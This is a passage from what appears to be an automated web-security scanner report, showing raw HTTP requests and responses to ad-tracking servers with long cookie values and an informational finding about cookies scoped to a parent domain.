User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+epi+gzC9/vSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFhOw3uzxK/X4Wxo4bJAn8weCR02tpdbg/bYqVKAiPNbO41848Z9KpOZKRQN0OL0sNJ8kypkLypj36j7Rm+95zJAPtLzSvq8LWyyFTHdPsSmDFFA0qN+hBON4H4Tla7JACrXtwZLbYkaPwY2qoG7JOev/Lg0kSAEhAN2j3I9if3B+HvsTrxBc9VsohGW/b5fsT/tmOND8GjL62aEQOR/ttAt0Onz37bTRxfaITzexWf8P4aLkngBQJFzAETbKu4iCLf6EtYpH/CugM6sxzwqlgJTBZx1A1ese7+q70nG0SvwKBqGIcTjIrFSjkDn5CzxinzmiyVAsj6DVZYCcQpO4K6wrWzDkpOGhK634uztGpLBxzNDkL2iLHVGdEKz5Km4E8XnMsb2RyQbsw85L6avb/ndujGtWPB5NktpSBX1O6xykGxIlNcuEc5A5TFcViyPHJABw0+SY5WKWD8c2KF7QNnJTYgtZ3vm04i/IDcOYg2G5ip1hh4c1VnrEwseNA7qKF/Cy3/YzH+zE075ArEjlj9BV5xbUneXnlUeWlupie2OZe8u2ys5vCR9G9DnRtFNHmqqqFsP1L8ZVcernhjIjN6695svzJRD24Wa6NO2oyXiieRAotYX9Fznu+/iFDnFKMY6gcKtR40K5DJPZ; rtc_8VB0=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; udm_0=MLv39zEJZjpn5t6vNwncn9Mhfm4nwPAq6ZuDn7aMZJ8AwsYAiiLCTArLH9zv1q5u+Lz4nRQU/ONtffuYZpEkRs7NSG0d9YhuoyF/MDVEU0eLoGV7CxWL+UMe7334j5jcQIpfs/yJtACeEpy404q3OrCeAI2wpexHC/IoDhZG5nt9JTlTOC0rUKpf3Tdo6hNWvImLqBVP8ps0lApz51dEO2W4LKo/vgAH8xS9eNJjV468/KuVWTcVzlHlhch6C7KXmQypGx4uASRIIVVd4xtBBX3TCSwTCSvq1RQf0H1lUJj7U2F7SbkoidrdNSNQYzn4q6heYKCeXjIGgaQ/A8hTpIO/gpYXHOAt71UVgPxcAm4fAa8JAjHA7iuw87T+BAc30ukDlNY1I/9/QVLCxTIXzloa/UqpgRTBHVAqkWtHNek2VRJBqrL5B/mWPUocGOb8DniKhuT7Ds7UPRBMexdFIHHI/mpU6yYmGNVwFQueFK01IWdDQarKK0P8NCGCo8hv8tuHkabXf8v7ZAV+yBQS8r3xiWTE1bP2OU/lS16fEp/i6wdmm3O3Fg3xrGmJbPDi0mf2WCD6VbG011u8gzVu9OTKDFxHneEny+70WuBBMYdpc5p4oKIFOTsS7fE2b96gku/XlfSB0WZoA90Ay6NAPMEL30rVqZKtDW8lAhzZn5hG6VyiZpsCneZNiXd42Fux0d4/yHR6wIaoS759qSOsmbV42omwnxZ2196cYXobfYLlDrGupJET0DH8mfrZFU8hHbFNX+CicMjq+3nGDTPBOwaqHx5Gmaav13axGITWM+e0An32Zjjz8ctWphmPC3OJhpGA3+YV5ZbMpWkEMLtxGX3SA42XlGiOTF6YKfGB3GsRFYIdJQizVIBWE/awvxf6lY17BunO3IleRCw4HjwlENbyeRATa7q8yTB3q6umGD8JoD/yd7gPPc2OmQggvinyn01WB9ifgMK1ZtoAtTumru6m2/c8W/PNvgE0J/rD8dFVwZD6OhaeAmx/3bq2Vh40efswOHYzNaqrYDJklpdWVRuKCgkS6AZszXI/3Xe9jUDDkny/WFWAvgeklDJRJwNq3pI58aI5stulcQdIJJxUIoDPQNhpwJFTVE7o31+O8FPJiSLpIuaSbCihy2Dxw97Rq2QUPRWf6knC0Sq5o9PDh2q14/AYkZyEBkX7XG8gWBrah2ZWvHM0o9R8Cf9Mpk3pmIDqOFy8UPj5Bnd6+JkF3fe6p+OFEdr7mZwx6PDLZJ+qHjC+zR+gFjxwrGYx7LCzolcSXN1KBy8NC7LbgOdmlFyg3aJRwNBHu+zaRVWgjK1MAkAQXABPMMNJncnjf2mzZVZK5i7CVqutEvzATQAk/4e2gw1H+6Hrv9gG9XpGMmoJo0SYS9XA8fFkwrHVqpCX1aVEMSdMOLDjPQzYn6yL0C1Z3E3sZA6/rAuE2WDyQcqns3VA4i/eJ7mPOghnw1QJZDLPMjbOaVyZ9jFId0OWFFkTtXgjPjkLLEWjvMPWD8HrDp3nIsDSmoCZEdTF33/bQxSuGrV7CPQoqiVTUuzmqVjVmH9c2zitJblsG2xUll03h/2VyIoVcdT7u/BuNBnmNQZlo5GlwAK7lt5iJZl/jA==; rsiPus_ujqo="MLsXrrEOpxpv55C28tahZ2a57v6B9Bu9Y8OavLvXmNxWuZvP+AaSaAp+hCNi+Atwis1ELtJdrj4R8jRRkHy362Kg9l9j12Fne8dMQJZUXWmSdO5nwhjxWdV4Kc+ZjwDWyB3QMjJ4fF+m9lVo3qnvZVw4LutWRkL22Hw4Kz6k0cFJN0i2ZvAbE7Bstv7fR0SabeL+ZpICwVpx/u0HdlAUDc7lBUsfbQGZgZL0dTqOST8wX+PhUN1bZVgcaXGzTvtwVFXKYB2I3CNvw5vwJcg2LzV80dREIWCFz+RSmIHpscvV6HL3O21RAGNtSP9eKQiAqmxufZrUZtvKGTbQ4OUPapeYisBn/mLyG+DnrXih7YstoaXSNXNyBw9tnu/kYZ2Wy8ugsYdZdg79OiSRnJpTdWxYyMt5odORpHaCcTsLhgkMx+XFx0NxPpHWWMAviDZpD0+2ZoVe81SFPEBm3tp9yfV7bk5TiayC92SSkcgbZwy4cnmVqKB1ZG8TpmtgVwdnUNuLPq/2hXZ1A7Tf5+ubEWjoHbM9bi/yeQgVBOLh/6/UIjd4TnzEQCQOhk2wNe7pWzhqvI+5X8Cqmdvu6tpVa7C+Nk6GnfGUcGt8PFuFkcJ4tfVffnafOFFkLT1PebdMfm+f7hgIjxjRnkEBAUd4Fdp1eVbRfHnggvjmoPJwywKL7UxyIW//r3C7XOcp2c+yZ3MmMzd4W8THoM/Lw2eBqcUGUAYA2HLPurkH25Rs928sz4FlT5nUB9yXKc45760A7dHuQmUrDhIZleDb2rHzVChRvJNfuMCvH4iu6x+Irn3VJOuyy8lpbyeOR0wRziDxiiKjApW5nTVuxGG0RszGW7rAw7zvFLmiOwMfhEok8Cv90GF6Z0B10Fk8uIHCKCDzV87TdQHUFyTYmzoO34HXLt261b4BNW7ml1nYlv6e39/Gn44aib/c1kb7tHnM+/JPsM7LiVmw3tGtbWIJiaZ+VLboWASTqxZUKhSbzk2s3hi2ngwzW04eEE+RFHRAV1AYVJUXrhRtK3yminctNkCVsQ3O/MonDQRvrY0zxZSFczNaLVfhEV3c2j5zNjp/154CvaHZdLa5M4QL0vDFSyslWGvxs13V5K8zoAQ7fXdIvu4gsY2pns2QyHQZ7oeS1FLsVa3QsqgRlPg+JJ2saXdJqe7hQZrzxfflyM60fA1SOkpM2UeuKkfrkhm14zhLHX3UBJ+6rY1WiZ9Kb3WsWx18RnkyX9hDtKk1ZcU9hmLPQjUstFZuV3vNJnO9eRadVgNGKD2nQQYghU1ZjZY2pPjItsnAco2oRRh7KAph2R4qy5kWFJEYjfrXIV5ow0VrekoHWL2s+EXgOaxc1cBJteHWs9iiLH4PhG0Hv/ES/wVObzmPW+72HqcTdMEaeaJerLU="; rsi_us_1000000="pUMV4x9HOCYc7H2Hdyd9gGYQxP6z87yv1/38fIfxXZ6hwopPJc1FCSfeEyinowUDu/6bHU/fppSZT968mAptVLd0gbR5UmTQx7YoMtsHUFy++96sia434M7cM6z8EDegCG0sJZJi2jDtzdF4Bo9ZEBaq7bUCfOnAlu2nto+pv7eVoA2lQLC4rSCbUn4f3OIOO9UPbm75nLJpjm/LzlQbrc2B3h7Ks3L+GK58JHL35KxtgSGRMVLv2jEjbDneecAAFdo+jT5YLix73R4OU6xpNVAlKXCKMxIbWoxbnl9NNfIUcezUALRReb4lPzpTmIJXGt8o8VyiAFcOKaf7Cll7pouSTtxLa808q4zjl3Si+70znE5U9HGXN9e0bM1nS8X3BVzvsR4lH1I0UVdEYSl8FssU6pOavCj/jzZ8dH93xxZ1kQqIfCzSdlAImPmYeIDywPZWHS4/c8M6xWdp3AS2760efiUUGVEja50v2Mgdj+FhNbzJBr6jjaLG1xPfKfiYRzGLqQJv70zj6yMXZOtcf2K6F8EPs02PSCRo8maGxM3jEqHlTBdWI15Ded0AEwZ+ldfwdW7LFpv9cYbjbVEGAEuNOw+jcfmaBErhNtUI56iyeKcMmZyqPjA/GY3kHS89R6I7UAgPbcSex8A2bvfG9m5WaangtU32B7+q0hZCsarOYUL5Qqt4HD5zctFUakMYCKNLuU58Vu0Y5jaiLe+2D5x69In9bkhvruS2v380SNEpf5JBLUF0UsgSyrb8SZUsFVBnCQz7podYm58A+PYHGpfwJjo8BJ1pEcK+39KU/V8qlF3czYQjVBMh5D3kw60Q1MaNZ06jJjhCdUiHRG2J4o/WKdmjurh9K2FQ41UexDSAIOxv2Gaj5B+DRmLckXKLc0IP7lV2qMc6F87RbtjjbqYCcRlS+1ZH6mGyDHaWyuRCm00rSJecxBBvf0OPGpaCt9rVDd5dC/apsRL18RnFeIEyp/3XM/Gc5Ad+fCgwcLqZQhNpb6Fxfn4q+D5YqrCgOvn6wVSbMsu1vuGHJmkjQrqwww9McBQBTyZQcfFJRejePaisI3pQASyehBE7EGo6WueN8TUdxTLZBZgJu4q7ylaocHjz3Yr2gGEohYG2D8NUJGQGY4tr2iWNO9B55kC6k+7phvae1BkP3V7IhltGq+ELTDsmYocV0YjzeXdSF/YD8e+YLB64MJcSTsig9Ldov8j7LyNfbPTQRF1NbfrSChWzM0cYu7WH82kA4CkLjOvAO5+XXThBqtKAwLVYsJReui/62jgOhOiO1SbxXRYvQgxUJG/2bwdGIx7xXGzYZxQrbm1Lgiq4sduZppPZJ+nHQ+jUO9TSAQqvBl6UErn8jCzQZMbe7MEhaqGO3sVg26k1sDHTMFugNKMbDnN0uiTvOQcy+YZ4SmONcbnTSJfNfN67BozcnNAf58eVd7rSAhG9q/tZkXUcqfkb0e3zx/7oyEKj7iyxN80Dr8ekHicYqp6nkydKw7W2L0yb5WDCn0+nz1vNALBSOlQg6z4gxabk3UTASDt6JqWJ9LhG0M7EJSG9GIUCKhh+Tn9QvE1nsV53rQsn5MFjFO/kVSzk/YVCbflod3UGhyrThMVAyqh/vec+xYJDvVaM+vjUDtFG8BGKdfF3Sux0ymaiZV6jOEckNKL4C73eZB/Y+bi9yHR+zjJEUKqTo9Dil9dLFzGGpLbt5+sM+I3yvcm8JAU2PiR745PmrLrVRU6EJyGuFH3tsRHMkw+hS2Uf+JnP113fUmTGhYLsXE4DR1HMD9ALfpUs0ymAJLmRxfquWg3yLE25bUXhK98K4A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ujqo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ujqo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vb1g="MLsXrrMO5Bpv55C26taiZ2b5rkKgtP29EMOeggN9tKCDiZO6EZttNm2XYivlRGvJx3wqeAcA7jRrX4KAU1K7A+k+BscDKqs11h5Ln0AGZdNAlKE21PnezAF0Vpa5nplUgoeT1FkEjUwn10WWQForqzNGcfW5TT3ZB21+K1p411cIWT4MENrJ2pcdkQJJr3Te0YRraIEpF2JL+sMwpVvzcHUbT35biZ2A4aCHV9gMOKS1C2x9rftcj9mccnaZl2FYiNxhYz0QS38eu+VXwOFkazU8VjBCWNx1ZFw2fyX1m8R5aQ4iY2gCJDFu8RLdNYCC7w1qbrTYOKOE8PUiod0iYsBrL1GFw5Ht0ifSaSW9sWtuub5gKwqetVZtxjkIM6HTmsYEBo7GciEIyQNsBk0Kb8Dvf3EcEplIiYHdamRHYXp3iBgTveV2nLYyU0CktPZqfomOcRnHmzylTyZ/bDLb01GUdIYhaMOgNmSCQf1chYsURxKIM/3j6m5ZRgmh1r52/BLEUm5QCa9xdFYyQExfqXNm58P4Il75xiGlKRJNjCgGs+mh+gp1qMXnZJy6vwbAWCz8oMWYOiICBKJrm9afIK5fpsjmAuZCcyLPyWbVl0EMlSq3f3IELexr6T/MZR+f6FNumv71ZK9dkjyhk4zf5cVJpSb29HMy9LU3Mskc3QSLAdDJCZT/gCKl3vp4oZ4ESZKq9Ob50+hsIlZbNnEek7E4JOh3SH1Ykx5Ji53Dx2xXNC5mhEPkbfJN83+DG/3tr7WesXLZLn7TpK6guGpssajNpdORP6P3Lm11UlIoYug/2rsFhcU2949jD3nOqbvaqOsZ0GMceWN5pjtjfqrF6nacP2JBGF4lj6mOqvV7bxr8K+Q2r2S+DNbMzaD97dR2K14RfvAelQHrkfd+W1YUbUsViDUzo7TPe1pfXvjUqXqWcPDplzntcJfLdowiUIgmaM6DUQoQwzLmB6qNV89ZFw5zr7qb10x0VplTCf7H15GVtuQvaskbEEequlU5Ok7crxPpqTAZygnjMQiAD6/cGLfaunTD2PBStVJzRzvoknCy1TgVl1xu0OMO1vr0FmGkkU2TVvJYNgkCBmSickv2DCqEqueAGcPBPUrua+VljZwWD1re8JE0CsKffVFT5gqhDhfM8g9m33jTnkr6i0GqYvVAiPuZBIYSCXIrYt1m1NfoNo3SE/4Xhn/pQ695F6lxiFfSV2jzErph8AX0xQ4PLFBFqPmLn0mFK5abMNSSAtSO9JxRSl/eMklVw5vFuULphCBvQsbvCk+xocxTvtHgwoRNqb5IDgNOpen2sOJ///1Yl0FFVuxNPD1Tp3kfzXxs/UsQI0WRFYbvdxugerQVhpTUV0BcTxpNLUxM6yGwUeZymPUCP2b/KMoKxnDfQ7WJuczYg216QJ5mQr+0CPxRGnMwnlvsfheJVZDujCGK86Y+"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4y9DPxYULWF0UBr2EFb5ofBLgcZpb/18uFL7iZbWSISXnXYnxS1Z30ODwyG99mllFNM5gOZZ+JSCL2vuVvIWQhr6NZ1DrvOywE3pzfcw2pA6Na6mIl2PYMRQWVRvby8dTZXsi9L5bZyt2lL3gRXA2JXac7hVKrJQMkhIuN/bx0d3iXgSAZT7bMHNr5OGCdoBZpZ/XCmN0WbEd/6gsPiZZWXHU2K+jXM6z0XTAdE+auHBGf3OMT34oqTFz4ayUvSp357vxuHfkVVIHhiuMS08w0+rpUxmKjRf/qr1DQ390lGA+HXk4ZvEzsJps5AwxHkQrsod7v0X8ptcasgHhiowYzqr1FPwLGIE9X/EIwSDQ2oEwikTXE/fBZTEk6cWzdecj8RN+zuXFwCHXuVL94I1N4Mr+5WWQGLdD4WCSVvD14dKUFDUvABxg45jZqv2EnC93LWw2If6eUuESWfyUCsLCBeAYNgdUOiUcEc/Ykr7ZHESGk+JUJMT34VcChM6NMFMJjbAuQ6dOLjyEzUGtj4D4XWxoAKe0iE4pUOWF4LHYA3FTo0+X+YN2dQbYThdxc2JBxnxhuziQixTq8BTHV05ETdhm8wDlmcczNX6Wq0EHUtQTKhRAMadeOhedQzxT6IZnsgSCjsF55I0rC1YNlfscATxOlgjr4fz/YDVwFhHAs8gJTPwzLlMlNDeSuLjGG5oi9xmTkSdP2naqhQrw9hatYL50RaMwmjtY0e5NjLP6IiRUeIbbzKpFAkK+Z4dcwfDXuQSmGQZCN3JhwYxsbCoo7pb+Gr6WymFn2KrnXU94SyjxIdt9mdXPtc3lTWM8ZhZJtuZCDdjw5WaK1B0qUCodwN9E3DEbhCGUoJ5iB5EuoPvZR/+R+JXL6KCXvceXi6MNjGZFKi4h715soaPvddSoRCUr8mgJQHBkeM5G7PhbH44azAP63pTli80JhEzHUvrGNkAlCkCUtfbQBOisgu+x55Os+I3Dn+PgzRFCC6ti9zrId6+eb8xwBHtMMur8k4098l2Su1XV4mJUK4sqSaCvq5MK+lqsTiXU/AkJcYqFSWonsN7+wTZtz+7bZMNQJa+1Srzh00menUxa81uoqrEomA0JmykSFQ2ZnMl5P4EQdVVquCRouQ43CTCqK8re6NPHBm2bf2BW5PNYo7tFTRSA+vTArAouLhHFgH6dL+kbG+Fq1bRboXp3nKHWqgcrrYwGhXbPXeRMqCkbPdxpIVh6uD9SIyimmegjH2Dgw8zXxivWOP4/v5BDDLosvO6qVIgHQVgeHVIjpgnFOWDpMKXcIr6gNlY1Z2LEMo0KdfufCmr93gBlGL69+JlRegZqgs8cYf++tAQxFiWl371PVfNDzB6DvH6MCtVt1jaFTcsJd+8AmVtyIXsHsfS8gJKkrQFmrR8QrCsOPP0LX3TSrYFuVapuFIg4840E/x1NLwrT+ZrCiVLqVUPDwL80/joKpgcV4SEzDcFsxxZ/KeAVXjyVJXZMXi5+fxbpYCfWFEwgv1Wsz+tgdJY9A0IdHokXL7J0Mmy2WsbYykEXuJ5TLZrQfCj++okG0ybH6VzVsQgImDiWCDg9a6rHcnivUpUbwYuUsT1lVKa9hrxhu2gfQi7961IlxJsBfQhDJn5YPvAG3fMPdpR6xxzieVQuvolnhhxznMndIfFc3a0sMwZ2ymntmGZJ3FQkpF4s2HSq/SzfCLgk4PaRPIcLizaWvmoHGfyFkAM0lXNiNs2Jjgk2yivn9eZvhZvKshtPqX2dmDXV3Kp4UYxikKg2y05nN+xuwvl5YUGIp4hrpKpO/O/XhgmctTfjycOsYcBdzNc3VqkhAYB2nl8uFmC72E="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:33:47 GMT

GIF89a.............!.......,...........D..;
8.13. http://adx.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESEAYDROJIBlXAxjjwOAYYXzI&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChII-ooBEAoYASABKAEwlMKv7gQQlMKv7gQYAA..; acb126273=-@L6D208WMq5cpg20/dR>zXWq?enc=PDw8PDw8DEAAAAAAAAAIQAAAAAAAAAhAYhBYObQIEUAK16NwPQoUQB6f76tOO90oSsYda6b2ziUU4ctNAAAAABRWAwAdAgAA4gEAAAIAAAAPCAQAksAAAAEAAABVU0QAVVNEACwB-gAkAwAAxhABAgUCAAUAAAAA5xc56wAAAAA.&tt_code=1588565&udj=uf%28%27a%27%2C+12656%2C+1305207060%29%3Buf%28%27c%27%2C+60150%2C+1305207060%29%3Buf%28%27r%27%2C+264207%2C+1305207060%29%3B&cnd=!RRvkDgj21QMQj5AQGAAgkoEDMAA4pAZAAEjiA1CUrA1YAGDaAWgAcAB4AIABFogB4hWQAQGYAQGgAQOoAQOwAQG5AQrXo3A9ChRAwQEK16NwPQoUQMkBMzMzMzMz9z_QAQA.&ccd=!ZARnJwj21QMQj5AQGJKBAyAA; uuid2=2724386019227846218; anj=Kfw)(Hg0)m)_Uh2u:[r@PdBuy]S=FdY*FXw(hO!$dY(koMBFV95dEhO@gS%S=?Gc6U#?^ITW.C%.HqhKFPS0R:Ol/][9xsNXM?#=popAjMJ!=!P'kjdtE#agd`VY]hTg'7jxCPQLa-IWtYkK56-6Rj<>QtuQMu]Fli*-A:DG1t]9*q=ZNiI'q#a$$?('BmwWkq5M+gDc$AkjBcFpf.^Km7HkC6E*s*W!hVTSm=VV<zcaLjQ#u^1u!hUCx)6f1NpiP^1'?YjrnLNx0X+hS.)S$dNhv^T14kCT98KUh_Mm2P`S>yQhx3G-Rt#$gkLo]g)HuNl?T7v:=$P9r<oMjHGZ?fL9-L4qV?C[kwp-eJtVF#peHsxA-xhGAPY@nTUG3*pBV[T@@xw68=86_wVWO9'0NB.S=4gt<_3sB/bm8)W^6FLt^)4EgEJ/n!hdKiPI?u]%e5$Lu3[D]fwa%'PFavH5F)k4ZOPiuvV>cQWQorFp=v5%adk(P$^d0xFLswEkQxCTdbg4S$7QP#j1V6Zc+KDDhon2h0OFfImh+#oLE(br@zr_m-M%^o6v$@kezl*!N3zot*`H_R!Crp3O+$wmeHb:f=swYD<R*X1j7U1HH64sb>8f09y:8/XSP-Lk*'#mnr*d(+ZL4q_tb%p8LE0px*?qu^KY>qH>0:w9Q8K?zQK*Z1FYq4so09Y?yx#wwNwyrk6Ak

Response

